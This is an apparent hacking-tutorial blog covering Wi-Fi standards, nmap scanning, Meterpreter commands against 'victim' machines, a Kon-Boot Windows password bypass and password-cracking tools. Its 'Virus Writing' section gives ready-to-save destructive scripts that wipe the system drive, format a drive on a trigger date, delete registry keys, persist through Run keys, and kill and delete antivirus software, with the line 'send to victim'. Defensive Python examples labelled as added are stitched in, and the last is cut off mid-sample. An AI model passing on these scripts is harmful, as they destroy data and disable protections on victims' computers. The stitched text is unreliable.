Friday, July 17, 2015

Introduction of wifi

Wi-Fi is the industry name for wireless local area network (WLAN) communication technology related to the IEEE 802.11 family of wireless networking standards.
Wi-Fi technology first became popular with 802.11b, introduced in 1999 and the first standard in that family to enjoy mainstream adoption. Today, Wi-Fi refers to any of the established standards:

802.11a
802.11b
802.11g
802.11n
802.11ac


The Wi-Fi Alliance certifies vendor equipment to ensure 802.11 products on the market follow the various 802.11 specifications.
Consumer versions of Wi-Fi products have additionally maintained backward compatibility.
For example, 802.11b, 802.11g, and 802.11n equipment all can communicate with each other, and mixed Wi-Fi networks with devices running multiple of these standards are commonly referred to as "802.11b/g/n" networks.
802.11ac equipment also communicates with each of these others.
The old 802.11a technology is not compatible with these others and has fallen out of mainstream usage as a result.

Radio Types of wifi


           
802.11

 In 1997, the Institute of Electrical and Electronics Engineers (IEEE) created the first WLAN standard.
They called it 802.11 after the name of the group formed to oversee its development.
Unfortunately, 802.11 only supported a maximum network bandwidth of 2 Mbps - too slow for most applications.
For this reason, ordinary 802.11 wireless products are no longer manufactured.


802.11b

IEEE expanded on the original 802.11 standard in July 1999, creating the 802.11b specification.
802.11b supports bandwidth up to 11 Mbps, comparable to traditional Ethernet.
802.11b uses the same unregulated radio signaling frequency (2.4 GHz) as the original 802.11 standard. Vendors often prefer using these frequencies to lower their production costs.
Being unregulated, 802.11b gear can incur interference from microwave ovens, cordless phones, and other appliances using the same 2.4 GHz range.
However, by installing 802.11b gear a reasonable distance from other appliances, interference can easily be avoided.

Pros of 802.11b - lowest cost; signal range is good and not easily obstructed
 
Cons of 802.11b - slowest maximum speed; home appliances may interfere on the unregulated frequency band

 
802.11a

While 802.11b was in development, IEEE created a second extension to the original 802.11 standard called 802.11a. Because 802.11b gained in popularity much faster than did 802.11a, some folks believe that 802.11a was created after 802.11b.
In fact, 802.11a was created at the same time. Due to its higher cost, 802.11a is usually found on business networks whereas 802.11b better serves the home market.
802.11a supports bandwidth up to 54 Mbps and signals in a regulated frequency spectrum around 5 GHz.
This higher frequency compared to 802.11b shortens the range of 802.11a networks.
The higher frequency also means 802.11a signals have more difficulty penetrating walls and other obstructions.
Because 802.11a and 802.11b utilize different frequencies, the two technologies are incompatible with each other. Some vendors offer hybrid 802.11a/b network gear, but these products merely implement the two standards side by side (each connected device must use one or the other).
Pros of 802.11a - fast maximum speed; regulated frequencies prevent signal interference from other devices
Cons of 802.11a - highest cost; shorter range signal that is more easily obstructed
           

802.11g:

In 2002 and 2003, WLAN products supporting a newer standard called 802.11g emerged on the market.
802.11g attempts to combine the best of both 802.11a and 802.11b.
802.11g supports bandwidth up to 54 Mbps, and it uses the 2.4 GHz frequency for greater range. 802.11g is backwards compatible with 802.11b, meaning that 802.11g access points will work with 802.11b wireless network adapters and vice versa.
Pros of 802.11g - fast maximum speed; signal range is good and not easily obstructed
Cons of 802.11g - costs more than 802.11b; appliances may interfere on the unregulated signal frequency

 
 802.11n: 

802.11n (also sometimes known as "Wireless N") was designed to improve on 802.11g in the amount of bandwidth supported by utilizing multiple wireless signals and antennas (called MIMO technology) instead of one.
Industry standards groups ratified 802.11n in 2009 with specifications providing for up to 300 Mbps of network bandwidth. 802.11n also offers somewhat better range over earlier Wi-Fi standards due to its increased signal intensity, and it is backward-compatible with 802.11b/g gear.
Pros of 802.11n - fastest maximum speed and best signal range; more resistant to signal interference from outside sources
Cons of 802.11n - standard is not yet finalized; costs more than 802.11g; the use of multiple signals may greatly interfere with nearby 802.11b/g based networks.


802.11ac

The newest generation of Wi-Fi signaling in popular use, 802.11ac utilizes dual band wireless technology, supporting simultaneous connections on both the 2.4 GHz and 5 GHz Wi-Fi bands.
802.11ac offers backward compatibility to 802.11b/g/n and bandwidth rated up to 1300 Mbps on the 5 GHz band plus up to 450 Mbps on 2.4 GHz.


Other IEEE 802.11 working group standards like 802.11h and 802.11j are extensions or offshoots of Wi-Fi technology that each serve a very specific purpose.

WiMax also was developed separately from Wi-Fi. WiMax is designed for long-range networking (spanning miles or kilometers) as opposed to local area wireless networking.

Information Gathering

Information gathering means collecting as much information as is available about the target network. Nmap is the best tool for collecting information. Users can also execute their own scripts via the “Nmap Scripting Engine”, which is one of the most powerful features of Nmap. A list of Nmap commands is given below:

1. nmap 192.168.0.1   (show the open ports of 192.168.0.1)
2. nmap 192.168.0.1/24   (show the open ports of every host in the /24 network, 192.168.0.0 to 192.168.0.255)
3. nmap 192.168.0.*   (show all open ports in the range)
4. nmap -O 192.168.0.1   (check the operating system of the specified internal IP)
5. nmap -sP 192.168.0.1/24   (ping the range of IP addresses)
6. nmap -T5 192.168.0.1/24   (quick scan)
7. nmap --top-ports 20 192.168.0.1/24   (scan the top 20 ports of the network range)
8. nmap -sT -p80 192.168.0.*   (scan for TCP connections on port 80; -sT = TCP scan, -p80 = port 80)
9. nmap -v 192.168.0.1   (verbose scan of the top 1000 ports of the IP)
10. nmap -F 192.168.0.* --exclude 192.168.0.2   (scan the top 100 ports of the IP range, excluding 192.168.0.2)


Full form of  command


1. -sT     TCP scan
2. -sS      SYN scanning
3. -sF      FIN scan
4. -sN      Null scan
5. -sX      Tree scan
6. -sP      ping scan
7. -sU      UDP scan
8.  -O       Operating system
9. -sI       Idle scanning
10. -sA     ACK scan
11. -F       fast scan
12. man  nmap -manual page of nmap

Information can also be collected with Zenmap, the graphical version of Nmap, which provides the same features and accessibility as Nmap.

Note: Nmap is an important tool with lots of features. Users don't have to memorize the Nmap commands, as most options start with the first letter of their name (e.g. -sT = TCP).
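Seen from the network being scanned, the commands above leave a recognisable shape in connection logs: many ports on one host, or one port on many hosts, from a single source in a short time. The following is an added example, not part of the original post, that flags both shapes; the log format, thresholds and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format (hypothetical), one connection attempt per line:
#   <ISO timestamp> SRC=<ip> DST=<ip> DPT=<port>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) DPT=(?P<dpt>\d+)$")

PORT_THRESHOLD = 15  # distinct ports on one host in one minute: vertical scan
HOST_THRESHOLD = 20  # distinct hosts on one port in one minute: horizontal sweep


def build_sample_log():
    """Return constructed sample lines (not captured traffic)."""
    t0 = datetime(2015, 7, 17, 10, 0, 0)
    lines = ["malformed line that the parser must skip"]

    def add(offset, src, dst, port):
        ts = (t0 + timedelta(seconds=offset)).isoformat()
        lines.append(f"{ts} SRC={src} DST={dst} DPT={port}")

    # Ordinary client: repeat connections to two services on one server.
    for offset in (5, 65, 125):
        add(offset, "192.168.0.10", "192.168.0.1", 80)
        add(offset + 1, "192.168.0.10", "192.168.0.1", 443)
    # Shape of a "--top-ports 20" scan: 20 ports on one host in 20 seconds.
    top_ports = [21, 22, 23, 25, 53, 80, 110, 111, 135, 139,
                 143, 443, 445, 993, 995, 1723, 3306, 3389, 5900, 8080]
    for i, port in enumerate(top_ports):
        add(i, "192.168.0.50", "192.168.0.1", port)
    # Shape of a "-sT -p80 192.168.0.*" sweep: one port on 30 hosts.
    for i in range(1, 31):
        add(120 + i, "192.168.0.66", f"192.168.0.{i}", 80)
    return lines


def detect_scans(lines):
    """Return sorted (source, kind, target, count) tuples for scan-like sources.

    Counting is done per calendar minute, so a scan that straddles a minute
    boundary is split in two; a sliding window would remove that blind spot.
    """
    ports_seen = defaultdict(set)  # (minute, src, dst)  -> ports tried
    hosts_seen = defaultdict(set)  # (minute, src, port) -> hosts tried
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not connection records
        minute = datetime.fromisoformat(m["ts"]).replace(second=0, microsecond=0)
        src, dst, port = m["src"], m["dst"], int(m["dpt"])
        ports_seen[(minute, src, dst)].add(port)
        hosts_seen[(minute, src, port)].add(dst)

    findings = []
    for (_, src, dst), ports in ports_seen.items():
        if len(ports) >= PORT_THRESHOLD:
            findings.append((src, "vertical", dst, len(ports)))
    for (_, src, port), hosts in hosts_seen.items():
        if len(hosts) >= HOST_THRESHOLD:
            findings.append((src, "horizontal", str(port), len(hosts)))
    return sorted(findings)


if __name__ == "__main__":
    for src, kind, target, count in detect_scans(build_sample_log()):
        print(f"{src}: {kind} scan, target {target}, {count} distinct probes")
```

Slow scans spread their probes over many minutes and stay under per-minute thresholds, so production detection usually adds a longer window with a higher threshold.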

Command For Backtrack

Backtrack Command for beginners


1. ? - help menu
2. background - moves the current session to the background
3. bglist - provides a list of all running background scripts
4. channel - displays active channels
5. close - closes a channel
6. exit - terminates a meterpreter session
7. migrate - moves the active process to a designated PID
8. run - executes the meterpreter script designated after it
9. use - loads a meterpreter extension


Backtrack Command for Network management


1. ifconfig - provides the IP address of the private network
2. ifconfig eth0 - displays the Ethernet adapter
3. ifconfig eth0 down - disables the adapter
4. ifconfig eth0 192.168.0.1 - manually sets the IP address
5. ifconfig eth0 netmask 255.255.255.0 - manually sets the subnet mask
6. ifconfig eth0 up - enables the adapter



Backtrack command for file management


1. cat - read and output to stdout the contents of a file
2. cd - change directory on the victim
3. del - delete a file on the victim
4. download - download a file from the victim system to the attacker system
5. edit - edit a file with vim
6. ls - list files in current directory
7. mkdir - make a directory on the victim system
8. pwd - print working directory
9. rm - delete a file
10. rmdir - remove directory on the victim system
11. upload - upload a file from the attacker system to the victim



Command for exploiting victim computer


1. clear - clears the screen
2. ifconfig - show the IP address of computer
3. execute - executes a command
4. getpid - gets the current process ID (PID)
5. getuid - get the user that the server is running as
6. kill - terminate the process designated by the PID
7. ps - list running processes
8. reboot - reboots the victim computer
9. reg - interact with the victim's registry
10. shell - opens a command shell on the victim machine
11. shutdown - shuts down the victim's computer
12. sysinfo - gets the details about the victim computer such as OS and name
13. keyscan_start - starts the software keylogger when associated with a process such as Word or browser
14. keyscan_stop - stops the software keylogger
15. keyscan_dump - dumps the contents of the software keylogger
16. screenshot - grabs a screenshot of the meterpreter desktop
17. set_desktop - changes the meterpreter desktop

Information Gathering

One click to copy full website



1). Download HTTrack Website Copier and install it.
2). Click on the Next button.
3). Provide a name in the New project name field.
4). Provide a directory to store the web page data.
5). Click Next.
6). Enter the URL of the website in the web address field and click Next.
7). HTTrack now starts copying the website.
8). Finish.


One click to copy E-mail address attached to website



1.Download E-mail extractor and install
2.Choose one of the three options
        a. Extract from search engines. (i.e. www.google.com)
        b. Extract from web page. (i.e. http://emailextractorpro.com)
        c. Extract email from local computer.
3.Hit start button
4.Finish


How To Check Domain Name Details:



1.Go to Who.is
2.Then type in the domain name you want to search 
  eg:www.google.com

How to Bypass the Windows 8.1 Password via Kon-Boot.

How to Install Kon-Boot On USB

Step 1: Download Kon-Boot 2.4.
Step 2: Connect the USB drive and format it.
Step 3: Right-click the usb_install2NEEDADMIN.bat file and run it as admin.
Step 4: A popup appears on screen; select Open.
Step 5: Select OK.
Step 6: Select Run.
Step 7: Done.

Note: While setting up Kon-Boot, remove all unused pen drives.

Now restart your PC with the Kon-Boot USB plugged in and press F12 to boot from USB. A Kon-Boot screen will appear; press Enter. The Windows login screen will then show a password prompt; press Enter again, and you have successfully bypassed it.


Supported up to Windows 8.1

Introduction to Password Cracking

Password Cracking is the process of recovering passwords from data that have been stored in or transmitted by a computer system. A common approach (brute-force attack) is to repeatedly try guesses for the password.
The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves System Administration privileges), to gain unauthorized access to a system, or as a preventive measure by System Administrators to check for easily crackable passwords. On a file-by-file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.

Computer programmers have been trying to create algorithms that crack passwords in less time. Most password cracking tools try to log in with every possible combination of words. If the login is successful, the password has been found. If the password is strong enough, with a combination of numbers, characters and special characters, this cracking method may take hours to weeks or months. A few password cracking tools use a dictionary that contains passwords. These tools are totally dependent on the dictionary, so their success rate is lower.


Tips to create the strong password




The longer the password, the harder it is to crack: Password length is the most important factor. If you select a small password, password cracking tools can easily crack it by using few words combinations. A longer password will take a longer time in guessing. Your password must be at least 8 characters long.

Always use a combination of characters, numbers and special characters: This is another thing which makes passwords hard to crack. Password cracking tools try the combinations one by one. Use a combination of lowercase letters, capital letters, and special characters. Suppose you have only numbers in your password: password cracking tools then only need to guess the digits 0-9, and only length matters. But a password combining a-z, A-Z, 0-9 and other special characters with a good length is harder to crack. This kind of password sometimes takes weeks to crack.

Variety in passwords: One important thing you must always take care. Never use same password everywhere. Cyber criminals can steal passwords from one website and then try it on other websites too.
In case you are not sure about the strength of your password, you can check it from variety of online tools available for free. Try this official Microsoft Tool for checking the password strength.

https://www.microsoft.com/security/pc-security/password-checker.aspx

•Example of strong password: AdZfL48024@ #$!


Tools of Password Cracking



1.  Brutus

Brutus is one of the most popular remote online password cracking tools. It claims to be the fastest and most flexible password cracking tool. This tool is free and is only available for Windows systems. It was released back in October 2000.
It supports HTTP (Basic Authentication), HTTP (HTML Form/CGI), POP3, FTP, SMB, Telnet and other types such as IMAP, NNTP, NetBus, etc. You can also create your own authentication types. This tool also supports multi-stage authentication engines and is able to connect 60 simultaneous targets. It also has resume and load options. So, you can pause the attack process any time and then resume whenever you want to resume.
This tool has not been updated for many years. Still, it can be useful for you.

2.   RainbowCrack

RainbowCrack is a hash cracker tool that uses a large-scale time-memory trade-off process for faster password cracking than traditional brute force tools. Time-memory trade-off is a computational process in which all plain text and hash pairs are calculated by using a selected hash algorithm. After computation, results are stored in the rainbow table. This process is very time consuming. But once the table is ready, it can crack a password much faster than brute force tools.
You also do not need to generate rainbow tables yourself. Developers of RainbowCrack have also generated LM rainbow tables, NTLM rainbow tables, MD5 rainbow tables and SHA1 rainbow tables. Like RainbowCrack, these tables are also available for free. You can download these tables and use them for your password cracking processes.

This tool is available for both Windows and Linux systems.
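Precomputed tables only pay off when the same password always produces the same stored hash, which is why a per-user salt and a slow key-derivation function defeat them. The following is an added example, not part of the original post, that contrasts the two storage schemes; it uses a plain lookup dictionary as a simplified stand-in for real rainbow-table chains, and the word list is constructed sample data.

```python
import hashlib
import hmac
import os

# Constructed sample word list standing in for the precomputation input.
WORDLIST = ["123456", "password", "letmein", "qwerty", "iloveyou"]


def precompute_table(words):
    """Hash every candidate once; afterwards each lookup is a dict access."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def store_unsalted(password):
    """Weak storage: bare MD5, identical for identical passwords."""
    return hashlib.md5(password.encode()).hexdigest()


def store_salted(password, iterations=100_000):
    """Hardened storage: random per-user salt plus PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def verify_salted(password, record):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(candidate, record["digest"])


def compare_storage(password="letmein"):
    """Store one password for two users under both schemes and report
    what a precomputed table can recover from each stored value."""
    table = precompute_table(WORDLIST)
    alice, bob = store_unsalted(password), store_unsalted(password)
    alice_s, bob_s = store_salted(password), store_salted(password)
    return {
        # One table serves every account when hashes are unsalted.
        "unsalted_recovered": table.get(alice),
        "unsalted_identical": alice == bob,
        # The salt makes each stored value unique, so the table misses.
        "salted_recovered": table.get(alice_s["digest"].hex()),
        "salted_identical": alice_s["digest"] == bob_s["digest"],
        # Legitimate verification still works.
        "salted_verifies": verify_salted(password, alice_s),
        "salted_rejects_wrong": not verify_salted("wrong-guess", alice_s),
    }


if __name__ == "__main__":
    for key, value in compare_storage().items():
        print(f"{key}: {value}")
```

A salt does not make a weak password strong: an attacker who holds the salted record can still guess candidates one by one, which is what the iteration count slows down.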

3. Wfuzz

Wfuzz is another web application password cracking tool that tries to crack passwords by brute forcing. It can also be used to find hidden resources like directories, servlets and scripts. This tool can also identify different kinds of injections, including SQL Injection, XSS Injection, LDAP Injection, etc. in Web applications.

Key features of Wfuzz password cracking tool:

Capability of injection via multiple points with multiple dictionaries
Output in colored HTML
Post, headers and authentication data brute forcing
Proxy and SOCK Support, Multiple Proxy Support
Multi Threading
Brute force HTTP Password
POST and GET Brute forcing
Time delay between requests
Cookies fuzzing

4.  Cain and Abel

Cain and Abel is a well-known password cracking tool that is capable of handling a variety of tasks. The most notable thing is that the tool is only available for Windows platforms. It can work as a sniffer in the network, cracking encrypted passwords using the dictionary attack, recording VoIP conversations, brute force attacks, cryptanalysis attacks, revealing password boxes, uncovering cached passwords, decoding scrambled passwords, and analyzing routing protocols.

Cain and Abel does not exploit any vulnerability or bugs. It only covers security weakness of protocols to grab the password. This tool was developed for network administrators, security professionals, forensics staff, and penetration testers.

5.  John the Ripper

John the Ripper is another well-known free open source password cracking tool for Linux, Unix and Mac OS X. A Windows version is also available. This tool can detect weak passwords. A pro version of the tool is also available, which offers better features and native packages for target operating systems. You can also download Openwall GNU/*/Linux that comes with John the Ripper.

 
6. THC Hydra

THC Hydra is a fast network logon password cracking tool. When it is compared with other similar tools, it shows why it is faster. New modules are easy to install in the tool. You can easily add modules and enhance the features. It is available for Windows, Linux, FreeBSD, Solaris and OS X. This tool supports various network protocols.

Currently it supports Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

7. Medusa

Medusa is also a password cracking tool similar to THC Hydra. It claims to be a speedy parallel, modular and login brute forcing tool. It supports HTTP, FTP, CVS, AFP, IMAP, MS SQL, MYSQL, NCP, NNTP, POP3, PostgreSQL, pcAnywhere, rlogin, SMB, rsh, SMTP, SNMP, SSH, SVN, VNC, VmAuthd and Telnet. While cracking the password, host, username and password can be flexible input while performing the attack.
Medusa is a command line tool, so you need to learn commands before using the tool. Efficiency of the tool depends on network connectivity. On a local system, it can test 2000 passwords per minute.
With this tool, you can also perform a parallel attack. Suppose you want to crack passwords of a few email accounts simultaneously. You can specify the username list along with the password list.
 
8. OphCrack

OphCrack is a free rainbow-table based password cracking tool for Windows. It is the most popular Windows password cracking tool, but can also be used on Linux and Mac systems. It cracks LM and NTLM hashes. For cracking Windows XP, Vista and Windows 7, free rainbow-tables are also available.
A live CD of OphCrack is also available to simplify the cracking. One can use the Live CD of OphCrack to crack Windows-based passwords. This tool is available for free.

9. L0phtCrack

L0phtCrack is an alternative to OphCrack. It attempts to crack Windows password from hashes. For cracking passwords, it uses Windows workstations, network servers, primary domain controllers, and Active Directory. It also uses dictionary and brute force attacking for generating and guessing passwords. It was acquired by Symantec and discontinued in 2006. Later L0pht developers again re-acquired it and launched L0phtCrack in 2009.
It also comes with a schedule routine audit feature. One can set daily, weekly or monthly audits, and it will start scanning on the scheduled time.

10. Aircrack-NG

Aircrack-NG is a WiFi password cracking tool that can crack WEP or WPA passwords. It analyzes wireless encrypted packets and then tries to crack passwords via its cracking algorithm. It uses the FMS attack along with other useful attack techniques for cracking password. It is available for Linux and Windows systems. A live CD of Aircrack is also available.


Thursday, July 16, 2015

Virus Writing


IMP. Note>> I am not responsible for any damage or errors on your PC; do it at your own risk. This code is only for learning the concept.

 All Scripts Here Are To Be Copied In Note Pad


>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code a .bat file


>>Disable Internet Permanently
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


>>The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* |y

Save It As Anything.bat
 

>> This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

It Only Works With Windows XP


>>Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE


>>Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


>> Bomb Virus

Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit

And Save It As Anything.bat

Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day



>>Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


>>Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop


>>Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


What sex is your computer ?

-> open notepad
-> copy code
CreateObject("SAPI.SpVoice").Speak"I love YOU"

-> n paste on the Notepad
-> save as > love.vbs
-> double-click on it


Make Your Keyboard Disco Light 

This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1.This piece of code makes ur keyboard a live disco..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

Instructions:
*paste any of the two above codes in notepad
*Save as “AnyFileName”.vbs
*Run the file
*To stop, launch task manager and then under “Processes” end “wscript.exe”

I hope u would like it..


How To Disable Victim Antivirus.

 Open Notepad Copy it and Paste To Notepad

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Now Save this code as .bat and send to victim :)


>>Tasks Kill


@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause

  save this as .bat file and send and destroy the victim & k!ll Operat!ng systeM!


>>Code type in notepad

@echo off
shutdown -r -f -t 00

>>Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC. ..!!..!



>>Popping CD Drives


*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop



>> To make your pc talk

Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."

u will hear now what u typed..

this works in xp, vista, win7 also.

enjoy!!!
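For anyone who finds a .bat file like the ones in this post in a mail attachment or a startup folder, the commands are distinctive enough to triage statically before anything is run. The following is an added example, not part of the original post: a small rule-based scanner whose rule names, thresholds and normalisation step are assumptions, and whose sample inputs are lines quoted from the scripts above plus one constructed benign script.

```python
import re

# Per-line rules, applied after normalize(); every pattern is built from a
# command that appears in the scripts in this post.
LINE_RULES = {
    "run-key-persistence": re.compile(
        r"^regadd(?:hklm|hkcu|hkey_local_machine|hkey_current_user)"
        r".*currentversionrun"),
    "firewall-disable": re.compile(r"^netshfirewallsetopmodemode=disable"),
    "security-service-stop": re.compile(r"^netstopsecuritycenter"),
    "recursive-forced-delete": re.compile(
        r"^del(?=.*/s)(?=.*/q)(?:%systemdrive%|[a-z]:)\*"),
    "drive-format": re.compile(r"^format[a-z]:"),
    "forced-reboot": re.compile(r"^shutdown(?=.*-r)(?=.*-f)"),
}
KILL_RE = re.compile(r"^(?:tskill|taskkill)")
MASS_KILL_THRESHOLD = 5  # assumed cut-off for "kills many processes"


def normalize(line):
    """Lowercase and drop whitespace, backslashes, carets and quotes, so that
    odd spacing or mangled paths do not hide a command from the rules."""
    return re.sub(r'[\s\\^"“”]', "", line.lower())


def has_spawn_loop(lines):
    """True when a 'goto' jumps back to an earlier label with a 'start'
    command in between, i.e. an endless process-spawning loop."""
    labels = {}
    for i, line in enumerate(lines):
        if line.startswith(":"):
            labels[line[1:]] = i
        elif line.startswith("goto"):
            target = labels.get(line[4:])
            if target is not None and any(
                    prev.startswith("start") for prev in lines[target:i]):
                return True
    return False


def scan(script_text):
    """Return the sorted names of all rules the script triggers."""
    lines = [normalize(raw) for raw in script_text.splitlines()]
    hits = {name for name, rx in LINE_RULES.items()
            for line in lines if rx.search(line)}
    if sum(1 for line in lines if KILL_RE.search(line)) >= MASS_KILL_THRESHOLD:
        hits.add("mass-process-kill")
    if has_spawn_loop(lines):
        hits.add("spawn-loop")
    return sorted(hits)


# Sample inputs: the first four quote lines from the post, "benign" is constructed.
SAMPLES = {
    "wiper": r"""@echo off
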